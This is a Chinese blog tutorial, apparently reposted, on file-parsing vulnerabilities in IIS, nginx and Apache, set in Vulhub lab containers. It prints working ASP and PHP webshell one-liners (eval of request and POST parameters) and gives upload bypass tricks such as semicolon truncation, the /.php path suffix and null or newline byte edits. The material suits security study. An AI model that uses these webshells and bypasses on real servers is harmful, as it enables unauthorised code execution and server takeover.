常见文件解析漏洞
IIS解析漏洞IIS6.X
#环境
Windows Server 2003 在iis6.x中,.asp文件夹中的恣意文件都会被当做asp文件去执行
https://i-blog.csdnimg.cn/img_convert/4650d03ff029f54058190121d1f1b946.png
在默认网站里创建一个a.asp文件夹并创建一个1.jpg写进我们的asp代码
<%=now()%>
#asp一句话
<%eval request("h")%> 单独创建一个1.jpg发现并不能解析
https://i-blog.csdnimg.cn/img_convert/ba8dcfc3e887f893b62c65f50a4c3a58.png
在a.asp下被解析
https://i-blog.csdnimg.cn/img_convert/04384a8978fe6ff088c65b3efca4c16b.png
在IIS 6 处理文件解析时,分号可以起到截断的结果。也就是说 shell.asp;.jpg会被服务器看成是
shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx
IIS7.X
在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在⼀个文件路径/xx.jpg
后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。
php.ini里的cgi.fix_pathinfo=1 开启
IIS7在Fast-CGI运行模式下
#环境
PHPstudy for IIS 配置 php.ini 文件,将 cgi.fix_pathinfo=1 注释取消掉;并重启
https://i-blog.csdnimg.cn/img_convert/bf3325da1b1543215ce6ba9c838fd9bf.png
IIS -->配置网站-->处理程序映射-->PHPStudy_FastCGI -->请求限制 -->取消勾
https://i-blog.csdnimg.cn/img_convert/fc4eb9b14ea1e813bb2b654f651cd0b7.png
https://i-blog.csdnimg.cn/img_convert/643f9ed5024515285a599dbe52fd0df1.png
然后在网站下创建我们的shell;并定名为1.jpg
https://i-blog.csdnimg.cn/img_convert/eeb5d7e45ebbd81e8a18743f60915169.png
去网站访问他
https://i-blog.csdnimg.cn/img_convert/6318ce1f7ae12058aee0db0a68374385.png
加上/.php就可以被解析为php文件
https://i-blog.csdnimg.cn/img_convert/a22c31e3df3e17691c18303cb4ea39e6.png
蚁剑连接一下
https://i-blog.csdnimg.cn/img_convert/7a45de13202a4b3b948b5cfaf4f3baa3.png
nginx解析漏洞
Vulhub靶场nginx
nginx_parsing
Nginx的文件解析漏洞...和IIS7.0的解析漏洞同样的原理,由于 cgi.fix_pathinfo=1 造成的解析漏洞
利用 1.jpg/.php 方式举行绕过
搭建doker容器
#搭建docker容器
yum install docker
yum install docker-compose
#确认是否安装成功
docker -v
#搭建Vulhub靶场
git clone https://github.com/vulhub/vulhub.git 搭好Vulhub靶场后
cd vulhub/nginx/nginx_parsing_vulnerability/
docker-compose up -d
#查看端口
docker ps
https://i-blog.csdnimg.cn/img_convert/fea1dabe0ae04847cb51a7229ecdef20.png
https://i-blog.csdnimg.cn/img_convert/8704d9049441424ef88681ccd25ffe7e.png
上传我们的图片马
https://i-blog.csdnimg.cn/img_convert/cb627d440f174e0eda2d9e73453e2b30.png
获取路径后
https://i-blog.csdnimg.cn/img_convert/c78b71595499d5bb5ed0a4610130f624.png
去访问我们的图片马并在后面加上/.php
https://i-blog.csdnimg.cn/img_convert/a2270aa6793f12740ef67bdc84009a46.png
蚁剑测试连接
https://i-blog.csdnimg.cn/img_convert/1e46ef6b2feeb8c9d64abeebf38c69e6.png
Vulhub靶场CVE-2013-4547x
#启动靶场
cd vulhub-master/nginx/CVE-2013-4547x //切换到靶机目录
docker-compose build //创建环境
docker-compose up -d //打开环境 创建好后打开我们的靶场上传一张图片马
GIF89a
<?php fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>'); ?> 上传的时候打开我们的BP举行抓包
在文件名后写上
空格空格.php
https://i-blog.csdnimg.cn/img_convert/c3a103d33912991e927fc519a9d6a275.png
并在hex处修改0x20 0x20把末了一个空格换成0x00;然后放行
https://i-blog.csdnimg.cn/img_convert/d485a3b7fe63cd2ce3ccced5e6ace4c1.png
https://i-blog.csdnimg.cn/img_convert/210f0024928bb8a1bf0a64488ec213f4.png
我们去访问他
https://i-blog.csdnimg.cn/img_convert/8e6b085355085214c8cce6819ae3fbe6.png
发现我们访问不进去这时候就用到我们BP再次抓包举行修改
https://i-blog.csdnimg.cn/img_convert/49c5e48b171cf6d1d3cbd0d29aa1fdb4.png
https://i-blog.csdnimg.cn/img_convert/4341dbddf2efb53efa316febd3dc91f2.png
https://i-blog.csdnimg.cn/img_convert/3d88c65cfa78222de19777347c94ff10.png
去Hex把20改回我们的00
https://i-blog.csdnimg.cn/img_convert/bb2094475932765ae2d10f033e1938fc.png
就能访问到我们的木马,但是这并不是我们木马的路径,用蚁剑连是连不上的
https://i-blog.csdnimg.cn/img_convert/381cb4097323f5040f6e972e131dcce0.png
我们的代码会天生一个一句话我们去连接他就可以了
https://i-blog.csdnimg.cn/img_convert/9069bb02d9fc1007d7c4f763ddfdad7c.png
Apache解析漏洞
Vulhub靶场apache
apache_parsing
Apache HTTPD 支持⼀个文件拥有多个后缀,并为差别后缀执行差别的指令
在Apache1.x/2.x中Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,
就再往左判断。如 1.php.xxxxx
#搭建靶场
cd /vulhub/httpd/apache_parsing_vulnerability
docker-compose up -d
docker ps -a 无论我们的php在哪都会解析我们文件里的php代码
https://i-blog.csdnimg.cn/img_convert/1f8105e268aa59649dfdc50524fed15f.png
GIF89a
<?php fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>'); ?> 访问一下我们上传的文件
https://i-blog.csdnimg.cn/img_convert/6ec2614989909ae570418cfc7615eba0.png
去访问一下h.php也是成功了
https://i-blog.csdnimg.cn/img_convert/bf6e0be5a9fbb277133e3fa9b5ad0684.png
Vulhub靶场CVE-2017-15715
#搭建靶场
cd /Vulnhub/vulhub-master/httpd/CVE-2017-15715
docker-compose up -d Apache HTTPD是⼀款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存
在⼀个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀举行解析,导致绕过⼀些服务器的安全
策略。
来到首页,上传文件会被拦截
https://i-blog.csdnimg.cn/img_convert/bd941be4efefbb8934dfbfc71ab1853e.png
https://i-blog.csdnimg.cn/img_convert/8c6b23cc47548ad4f658aa23e2d2d15d.png
BP抓一下包,在文件名后加一个空格;并把0x20改成0x0a
https://i-blog.csdnimg.cn/img_convert/a0497543d3c4bebd11da415ff06b3a32.png
https://i-blog.csdnimg.cn/img_convert/30c85091b4642d955e4a75485074568c.png
放行就成功上传;去访问一下我们的一句话
https://i-blog.csdnimg.cn/img_convert/2b9d183e956e6dfe7921bee7de8bfe64.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]